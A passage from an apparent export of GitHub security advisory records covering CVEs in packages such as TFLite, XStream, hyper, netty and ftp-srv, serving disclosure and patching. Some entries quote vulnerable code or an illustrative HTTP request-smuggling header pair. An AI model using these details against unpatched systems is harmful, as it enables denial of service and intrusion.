'https://nvd.nist.gov/vuln/detail/CVE-2021-32783'}, {'type': 'WEB', 'url': 'https://github.com/projectcontour/contour/commit/5f3e6d0ab1d48e64bae46400c85c490b200393a3'}, {'type': 'WEB', 'url': 'https://github.com/projectcontour/contour/commit/b53a5c4fd927f4ea2c6cf02f1359d8e28bef852e'}, {'type': 'WEB', 'url': 'https://github.com/projectcontour/contour/releases/tag/v1.14.2'}, {'type': 'WEB', 'url': 'https://github.com/projectcontour/contour/releases/tag/v1.15.2'}, {'type': 'WEB', 'url': 'https://github.com/projectcontour/contour/releases/tag/v1.16.1'}, {'type': 'WEB', 'url': 'https://github.com/projectcontour/contour/releases/tag/v1.17.1'}]","{'cwe_ids': ['CWE-610'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T16:53:38Z', 'nvd_published_at': '2021-07-23T22:15:00Z'}" +1.4.0,GHSA-jphw-p3m6-pj3c,2023-06-13T20:04:07Z,2021-08-25T20:51:54Z,,['CVE-2020-36214'],Data races in multiqueue2,"Affected versions of this crate unconditionally implemented Send for types used in queue implementations (InnerSend, InnerRecv, FutInnerSend, FutInnerRecv). + +This allows users to send non-Send types to other threads, which can lead to data race bugs or other undefined behavior. + +The flaw was corrected in v0.1.7 by adding T: Send bound to to the Send impl of four data types explained above.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'multiqueue2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36214'}, {'type': 'WEB', 'url': 'https://github.com/abbychau/multiqueue2/issues/10'}, {'type': 'PACKAGE', 'url': 'https://github.com/abbychau/multiqueue2'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0106.html'}]","{'cwe_ids': ['CWE-662'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:47:21Z', 'nvd_published_at': None}" +1.4.0,GHSA-mhhc-q96p-mfm9,2021-08-24T17:54:33Z,2021-08-25T14:39:58Z,,['CVE-2021-37686'],Infinite loop in TFLite,"### Impact +The strided slice implementation in TFLite has a logic bug which can allow an attacker to trigger an infinite loop. This arises from newly introduced support for [ellipsis in axis definition](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/strided_slice.cc#L103-L122): + +```cc + for (int i = 0; i < effective_dims;) { + if ((1 << i) & op_context->params->ellipsis_mask) { + // ... + int ellipsis_end_idx = + std::min(i + 1 + num_add_axis + op_context->input_dims - begin_count, + effective_dims); + // ... + for (; i < ellipsis_end_idx; ++i) { + // ... + } + continue; + } + // ... + ++i; + } +``` + +An attacker can craft a model such that `ellipsis_end_idx` is smaller than `i` (e.g., always negative). In this case, the inner loop does not increase `i` and the `continue` statement causes execution to skip over the preincrement at the end of the outer loop. + +### Patches +We have patched the issue in GitHub commit [dfa22b348b70bb89d6d6ec0ff53973bacb4f4695](https://github.com/tensorflow/tensorflow/commit/dfa22b348b70bb89d6d6ec0ff53973bacb4f4695). + +The fix will be included in TensorFlow 2.6.0. This is the only affected version. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mhhc-q96p-mfm9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37686'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/dfa22b348b70bb89d6d6ec0ff53973bacb4f4695'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.4'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.4.3'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.5.1'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.6.0'}]","{'cwe_ids': ['CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T17:54:33Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-955p-rc5h-hg6h,2023-06-13T16:52:27Z,2021-08-25T20:55:04Z,,['CVE-2021-29931'],Double free in arenavec,"Affected versions of this crate did not guard against potential panics that may happen from user-provided functions T::default() and T::drop(). + +Panic within T::default() leads to dropping uninitialized T, when it is invoked from common::Slice::::new(). Panic within T::drop() leads to double drop of T, when it is invoked either from common::SliceVec::::resize_with() or common::SliceVec::::resize() + +Either case causes memory corruption in the heap memory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'arenavec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29931'}, {'type': 'WEB', 'url': 'https://github.com/ibabushkin/arenavec/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/ibabushkin/arenavec'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0040.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:08:56Z', 'nvd_published_at': None}" +1.4.0,GHSA-64xx-cq4q-mf44,2022-02-08T21:01:27Z,2021-08-25T14:48:47Z,,['CVE-2021-39139'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. A user is only affected if using the version out of the box with JDK 1.7u21 or below. However, this scenario can be adjusted easily to an external Xalan that works regardless of the version of the Java runtime. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39139](https://x-stream.github.io/CVE-2021-39139.html). + +### Credits +Lai Han of nsfocus security team found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-64xx-cq4q-mf44'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39139'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39139.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:21:57Z', 'nvd_published_at': '2021-08-23T18:15:00Z'}" +1.4.0,GHSA-7f92-rr6w-cq64,2021-08-02T19:12:30Z,2021-08-05T16:57:42Z,,[],Storage corruption due to variables overwritten by re-entrancy locks,"### Background +When attempting to use the v0.2.14 release, @pandadefi discovered an issue using the `@nonreentrant` decorator. + +### Impact +Reentrancy protection storage slots get allocated to the same slots as storage variables, leading to the corruption of storage variables when using the `@nonreentrant` decorator. + +### Patches +This issue was fixed in v0.2.15 in #2391, #2379 + +### Workarounds +Don't use the `@nonreentrant` decorator in these versions.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.13'}, {'fixed': '0.2.15'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-7f92-rr6w-cq64'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/pull/2379'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/pull/2391'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T19:12:30Z', 'nvd_published_at': None}" +1.4.0,GHSA-qj3v-q2vj-4c8h,2021-08-18T21:27:27Z,2021-08-25T20:55:58Z,,['CVE-2021-38194'],Calculation error in ark-r1cs-std,"An issue was discovered in the ark-r1cs-std crate before 0.3.1 for Rust. It does not enforce any constraints in the FieldVar::mul_by_inverse method. Thus, a prover can produce a proof that is unsound but is nonetheless verified.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ark-r1cs-std'}, 'ecosystem_specific': {'affected_functions': ['ark_r1cs_std::FieldVar::mul_by_inverse']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '0.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38194'}, {'type': 'WEB', 'url': 'https://github.com/arkworks-rs/r1cs-std/pull/70'}, {'type': 'WEB', 'url': 'https://github.com/arkworks-rs/r1cs-std/commit/47ddbaa411afe7c499311a248a38135e5a192b67'}, {'type': 'PACKAGE', 'url': 'https://github.com/arkworks-rs/r1cs-std'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/ark-r1cs-std/RUSTSEC-2021-0075.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0075.html'}]","{'cwe_ids': ['CWE-682'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:27:27Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-82hm-vh7g-hrh9,2021-09-09T17:55:10Z,2021-08-25T21:01:25Z,,[],Partial read is incorrect in molecule,"### Impact + +Anyone who uses `total_size(..)` function to partial read the length of any `FixVec` will get an incorrect result, due to an incorrect implementation. This has been resolved in the 0.7.2 release. + +### Workarounds + +If you already have the whole `FixVec` `A`, you can use `A.as_slice().len()` to get the total size of the `FixVec`. + +### For more information + +If you have any questions or comments about this advisory: + +- [Open an issue to ask use directly](https://github.com/nervosnetwork/molecule/issues/new).",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'molecule'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nervosnetwork/molecule/security/advisories/GHSA-82hm-vh7g-hrh9'}, {'type': 'WEB', 'url': 'https://github.com/nervosnetwork/molecule/pull/49'}, {'type': 'PACKAGE', 'url': 'https://github.com/nervosnetwork/molecule'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0103.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T18:10:49Z', 'nvd_published_at': None}" +1.4.0,GHSA-3h87-v52r-p9rg,2023-06-13T20:27:27Z,2021-08-25T20:54:08Z,,['CVE-2021-29941'],Out of bounds write in reorder,"swap_index takes an iterator and swaps the items with their corresponding indexes. It reserves capacity and sets the length of the vector based on the .len() method of the iterator. + +If the len() returned by the iterator is larger than the actual number of elements yielded, then swap_index creates a vector containing uninitialized members. If the len() returned by the iterator is smaller than the actual number of members yielded, then swap_index can write out of bounds past its allocated vector. + +As noted by the Rust documentation, len() and size_hint() are primarily meant for optimization and incorrect values from their implementations should not lead to memory safety violations.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'reorder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29941'}, {'type': 'WEB', 'url': 'https://github.com/tiby312/reorder/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/tiby312/reorder'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0050.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:17:20Z', 'nvd_published_at': None}" +1.4.0,GHSA-6hfq-h8hq-87mf,2021-08-18T21:07:17Z,2021-08-25T20:56:18Z,,['CVE-2021-21299'],HTTP Request Smuggling in hyper,"### Summary + +hyper's HTTP server code had a flaw that incorrectly understands some requests with multiple transfer-encoding headers to have a chunked payload, when it should have been rejected as illegal. This combined with an upstream HTTP proxy that understands the request payload boundary differently can result in ""request smuggling"" or ""desync attacks"". + +### Vulnerability + +The flaw was introduced in https://github.com/hyperium/hyper/commit/26417fc24a7d05df538e0f39239b373c5c3d61f6, released in v0.12.0. + +Consider this example request: + +``` +POST /yolo HTTP/1.1 +Transfer-Encoding: chunked +Transfer-Encoding: cow +``` + +This request *should* be rejected, according to RFC 7230, since it has a `Transfer-Encoding` header, but after folding, it does not end in `chunked`. hyper would notice the `chunked` in the first line, and then check the second line, and thanks to a missing boolean assignment, *not* set the error condition. hyper would treat the payload as being `chunked`. By differing from the spec, it is possible to send requests like these to endpoints that have different HTTP implementations, with different interpretations of the payload semantics, and cause ""desync attacks"". + +There are several parts of the spec that must also be checked, and hyper correctly handles all of those. Additionally, hyper's *client* does not allow sending requests with improper headers, so the misunderstanding cannot be propagated further. + +Read more about desync attacks: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn + +### Impact + +To determine if vulnerable, all these things must be true: + +- **Using hyper as an HTTP *server*.** The client is not affected. +- **Using HTTP/1.1.** HTTP/2 does not use `transfer-encoding`. +- **Using a vulnerable HTTP proxy upstream to hyper.** If an upstream proxy correctly rejects the illegal transfer-encoding headers, the desync attack cannot succeed. If there is *no* proxy upstream of hyper, hyper cannot *start* the desync attack, as the client will repair the headers before forwarding. + +### Patches + +We have released and backported the following patch versions: + +- v0.14.3 +- v0.13.10 + +### Workarounds + +Besides upgrading hyper, you can take the following options: + +- Reject requests that contain a `transfer-encoding` header. +- Ensure any upstream proxy handles `transfer-encoding` correctly. + +### Credits + +This issue was initially reported by ZeddYu Lu From Qi An Xin Technology Research Institute.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'hyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.0'}, {'fixed': '0.14.3'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'hyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.13.0'}, {'fixed': '0.13.10'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'hyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.12.0'}, {'fixed': '0.12.36'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/security/advisories/GHSA-6hfq-h8hq-87mf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21299'}, {'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/commit/8f93123efef5c1361086688fe4f34c83c89cec02'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyperium/hyper'}, {'type': 'WEB', 'url': 'https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0020.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:07:17Z', 'nvd_published_at': None}" +1.4.0,GHSA-9pp4-8p8v-g78w,2021-08-18T20:22:32Z,2021-08-25T20:57:26Z,,['CVE-2020-36457'],Data races in lever,An issue was discovered in the lever crate before 0.1.1 for Rust. AtomicBox implements the Send and Sync traits for all types T. This allows non-Send types such as Rc and non-Sync types such as Cell to be used across thread boundaries which can trigger undefined behavior and memory corruption.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lever'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36457'}, {'type': 'WEB', 'url': 'https://github.com/vertexclique/lever/issues/15'}, {'type': 'WEB', 'url': 'https://github.com/vertexclique/lever/pull/17'}, {'type': 'WEB', 'url': 'https://github.com/vertexclique/lever/commit/4a4cca61cdb25061967d58522229e147483007b1'}, {'type': 'PACKAGE', 'url': 'https://github.com/vertexclique/lever'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0137.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:22:32Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-gv73-9mwv-fwgq,2023-06-13T20:33:10Z,2021-08-25T20:46:11Z,,['CVE-2020-35858'],Out of bounds write in prost,"Affected versions of this crate contained a bug in which decoding untrusted input could overflow the stack. On architectures with stack probes (like x86), this can be used for denial of service attacks, while on architectures without stack probes (like ARM) overflowing the stack is unsound and can result in potential memory corruption (or even RCE).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'prost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35858'}, {'type': 'WEB', 'url': 'https://github.com/danburkert/prost/issues/267'}, {'type': 'WEB', 'url': 'https://github.com/danburkert/prost/commit/04091d3e745c27590a5f1b7f581793e4159486b5'}, {'type': 'PACKAGE', 'url': 'https://github.com/danburkert/prost'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0002.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:20:08Z', 'nvd_published_at': None}" +1.4.0,GHSA-jqqr-c2r2-9cvr,2023-06-13T20:37:16Z,2021-08-25T20:42:59Z,,['CVE-2017-18588'],Improper Certificate Validation in security-framework,"If custom root certificates were registered with a ClientBuilder, the hostname of the target server would not be validated against its presented leaf certificate. This issue was fixed by properly configuring the trust evaluation logic to perform that check.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'security-framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-18588'}, {'type': 'WEB', 'url': 'https://github.com/sfackler/rust-security-framework/pull/27'}, {'type': 'PACKAGE', 'url': 'https://github.com/sfackler/rust-security-framework'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2017-0003.html'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:25:26Z', 'nvd_published_at': None}" +1.4.0,GHSA-7m7q-q53v-j47v,2021-02-25T02:01:47Z,2021-02-25T02:01:47Z,2021-02-25T02:01:47Z,[],Regular Expression Denial of Service,"A flaw was found in nodejs-marked versions from 0.5.0 to before 0.6.1. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). Input to the host variable is vulnerable when input contains parenthesis in link URIs, coupled with a high number of link tokens in a single line.",[],"[{'package': {'ecosystem': 'npm', 'name': 'marked'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.5.0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Feder1co5oave/marktex/commit/cc8a45288b59ca10a8fedaed9028072021be9999'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1679550'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T19:45:00Z', 'nvd_published_at': None}" +1.4.0,GHSA-pmw4-jgxx-pcq9,2021-02-11T17:04:52Z,2021-02-10T18:11:34Z,,['CVE-2020-26299'],File System Bounds Escape,"### Impact + +Clients of FTP servers utilizing `ftp-srv` hosted on Windows machines can escape the FTP user's defined root folder using the expected FTP commands, for example, `CWD` and `UPDR`. + +### Background + +When windows separators exist within the path (`\`), `path.resolve` leaves the upper pointers intact and allows the user to move beyond the root folder defined for that user. We did not take that into account when creating the path resolve function. + +![Screen Shot 2020-12-15 at 6 42 52 PM](https://user-images.githubusercontent.com/3375444/102293941-5a75fb80-3f05-11eb-9d71-0c190a8dcc75.png) + +### Patches +None at the moment. + +### Workarounds +There are no workarounds for windows servers. Hosting the server on a different OS mitigates the issue. + +### References + +Issues: +https://github.com/autovance/ftp-srv/issues/167 +https://github.com/autovance/ftp-srv/issues/225 + +### For more information +If you have any questions or comments about this advisory: +Open an issue at https://github.com/autovance/ftp-srv. +Please email us directly; security@autovance.com.",[],"[{'package': {'ecosystem': 'npm', 'name': 'ftp-srv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/autovance/ftp-srv/security/advisories/GHSA-pmw4-jgxx-pcq9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26299'}, {'type': 'WEB', 'url': 'https://github.com/autovance/ftp-srv/issues/167'}, {'type': 'WEB', 'url': 'https://github.com/autovance/ftp-srv/issues/225'}, {'type': 'WEB', 'url': 'https://github.com/autovance/ftp-srv/pull/224'}, {'type': 'WEB', 'url': 'https://github.com/autovance/ftp-srv/commit/457b859450a37cba10ff3c431eb4aa67771122e3'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/ftp-srv'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-10T18:11:21Z', 'nvd_published_at': '2021-02-10T18:15:00Z'}" +1.4.0,GHSA-6cf8-qhqj-vjqm,2023-09-13T20:22:24Z,2021-02-05T20:43:19Z,,['CVE-2020-28495'],Prototype pollution in total.js,"There is a prototype pollution vulnerability in the package total.js before version 3.4.7. The set function can be used to set a value into the object according to the path. However the keys of the path being set are not properly sanitized, leading to a prototype pollution vulnerability. The impact depends on the application. In some cases it is possible to achieve Denial of service (DoS), Remote Code Execution or Property Injection.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'total.js'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28495'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/commit/b3f901561d66ab799a4a99279893b94cad7ae4ff'}, {'type': 'WEB', 'url': 'https://docs.totaljs.com/latest/en.html%23api~FrameworkUtils~U.set'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/blob/master/utils.js%23L6606'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/blob/master/utils.js%23L6617'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TOTALJS-1046671'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/total.js'}]","{'cwe_ids': ['CWE-1321', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-03T07:46:44Z', 'nvd_published_at': '2021-02-02T11:15:00Z'}" +1.4.0,GHSA-5mcr-gq6c-3hq2,2022-04-19T15:19:08Z,2021-02-08T21:17:48Z,,['CVE-2021-21290'],Local Information Disclosure Vulnerability in Netty on Unix-Like systems,"### Impact + +When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. + +The CVSSv3.1 score of this vulnerability is calculated to be a [6.2/10](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N&version=3.1) + +### Vulnerability Details + +On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. + +The method `File.createTempFile` on unix-like systems creates a random file, but, by default will create this file with the permissions `-rw-r--r--`. Thus, if sensitive information is written to this file, other local users can read this information. + +This is the case in netty's `AbstractDiskHttpData` is vulnerable. + +https://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/codec-http/src/main/java/io/netty/handler/codec/http/multipart/AbstractDiskHttpData.java#L80-L101 + +`AbstractDiskHttpData` is used as a part of the `DefaultHttpDataFactory` class which is used by `HttpPostRequestDecoder` / `HttpPostMultiPartRequestDecoder`. + +You may be affected by this vulnerability your project contains the following code patterns: + +```java +channelPipeline.addLast(new HttpPostRequestDecoder(...)); +``` + +```java +channelPipeline.addLast(new HttpPostMultiPartRequestDecoder(...)); +``` + +### Patches + +This has been patched in version `4.1.59.Final`. + +### Workarounds + +Specify your own `java.io.tmpdir` when you start the JVM or use `DefaultHttpDataFactory.setBaseDir(...)` to set the directory to something that is only readable by the current user. + +### References + + - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html) + - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html) + +### Similar Vulnerabilities + +Similar, but not the same. + + - JUnit 4 - https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp + - Google Guava - https://github.com/google/guava/issues/4011 + - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945 + - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [netty](https://github.com/netty/netty) +* Email us [here](mailto:netty-security@googlegroups.com) + +### Original Report + +> Hi Netty Security Team, +> +> I've been working on some security research leveraging custom CodeQL queries to detect local information disclosure vulnerabilities in java applications. This was the result from running this query against the netty project: +> https://lgtm.com/query/7723301787255288599/ +> +> Netty contains three local information disclosure vulnerabilities, so far as I can tell. +> +> One is here, where the private key for the certificate is written to a temporary file. +> +> 